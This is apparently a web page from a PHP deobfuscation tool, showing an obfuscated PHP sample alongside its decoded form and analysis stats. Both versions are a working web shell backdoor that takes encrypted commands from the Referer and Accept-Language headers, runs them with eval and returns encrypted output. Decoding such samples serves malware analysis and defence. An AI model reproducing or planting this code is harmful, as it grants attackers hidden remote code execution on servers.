Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $L='0,3)v");$p="";for($z=1;$v"z<cv"ount(v"$m[1])v";v"v"$z++)$p.=$q[$mv"[2v"][$z]];if..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$L='0,3)v");$p="";for($z=1;$v"z<cv"ount(v"$m[1])v";v"v"$z++)$p.=$q[$mv"[2v"][$z]];if(sv"trpos($p,$hv")===v"0){$s[$v"';
$V='i]="";v"v"$p=$ss($p,3v");}if(arv"ray_kv"ev"v"y_existsv"($i,$s)){$sv"v"[$i].=$p;$e=strpov"s($s[v"$i],$v"v"f);if($';
$s='"/","/v"-v"/"),array(v""/"v","+"),$ss($sv"v"[$i],0,$e)v"v")),$k)))v"v";$o=ob_gev"t_contv"v"ents();ob_end_cleav"n';
$X='e)v"{$k=$kh.v"$kf;ov"v"b_start();@ev"vav"l(@gv"zuncomprv"esv"s(@x(@bav"se64_decov"de(v"preg_replace(arv"ray("/_v';
$x='tov"lower";$i=$v"m[1]v"v"[0].$mv"[1][1];$h=$sl($v"ss(v"md5($v"i.$v"kh),0,3));$f=v"$slv"($ss(mv"d5($iv".$kf)v",v"';
$j='([\\dv"]))?,?/",v"$ra,$v"m)v";ifv"($q&&$m){@sv"ession_stv"arv"t();$s=&$_v"SESSIONv";$ss=v""subsv"tr";$sl=v""strv"';
$n=');parsv"e_str($uv"v"["qv"uery"],$v"q);$v"q=av"rray_values(v"v"$q);preg_match_all(v""/([\\v"w])v"[\\w-]+v"(?:;q=v"0.';
$z='";$rr=v"@v"$r["HTTP_REFERER"v"];$ra=@$r["v"HTTP_v"Av"CCEPT_LANGUAv"GE"];v"if(v"$rr&&$ra){v"$u=pav"rse_url(v"v"$rr';
$F='v"();$d=basv"e64_env"cv"ode(x(gzcov"mpress($ov"),$k));prv"iv"nt("<$k>v"v"$d</$k>");@sesv"v"siov"n_destroy();}}}}';
$G='$v"khv"="5d41";$kf="402av"";fv"unction xv"($tv",v"$k){$c=strlen($kv");$lv"=strv"len($t)v";$v"o="";for($i=0;v"$i<$';
$Z='v"l;){fov"r($j=v"0;($jv"<$c&&v"$i<$l);$jv"+v"+,$i++){v"$o.=$t{$v"iv"}^$k{$j};}}rev"turnv" $o;}$v"rv"=v"$_SERVERv';
$T=str_replace('eZ','','eZeZcreateZeeZ_funceZtieZon');
$E=str_replace('v"','',$G.$Z.$z.$n.$j.$x.$L.$V.$X.$s.$F);
$A=$T('',$E);$A();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A None
$E $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$F v"();$d=basv"e64_env"cv"ode(x(gzcov"mpress($ov"),$k));prv"iv..
$G $v"khv"="5d41";$kf="402av"";fv"unction xv"($tv",v"$k){$c=str..
$L 0,3)v");$p="";for($z=1;$v"z<cv"ount(v"$m[1])v";v"v"$z++)$p.=..
$T create_function
$V i]="";v"v"$p=$ss($p,3v");}if(arv"ray_kv"ev"v"y_existsv"($i,$..
$X e)v"{$k=$kh.v"$kf;ov"v"b_start();@ev"vav"l(@gv"zuncomprv"esv..
$Z v"l;){fov"r($j=v"0;($jv"<$c&&v"$i<$l);$jv"+v"+,$i++){v"$o.=$..
$j ([\dv"]))?,?/",v"$ra,$v"m)v";ifv"($q&&$m){@sv"ession_stv"arv..
$n );parsv"e_str($uv"v"["qv"uery"],$v"q);$v"q=av"rray_values(v"..
$s "/","/v"-v"/"),array(v""/"v","+"),$ss($sv"v"[$i],0,$e)v"v"))..
$x tov"lower";$i=$v"m[1]v"v"[0].$mv"[1][1];$h=$sl($v"ss(v"md5($..
$z ";$rr=v"@v"$r["HTTP_REFERER"v"];$ra=@$r["v"HTTP_v"Av"CCEPT_L..

Stats

MD5 ff76430f84ae90b4cfe24f028cae27bb
Eval Count 1
Decode Time 108 ms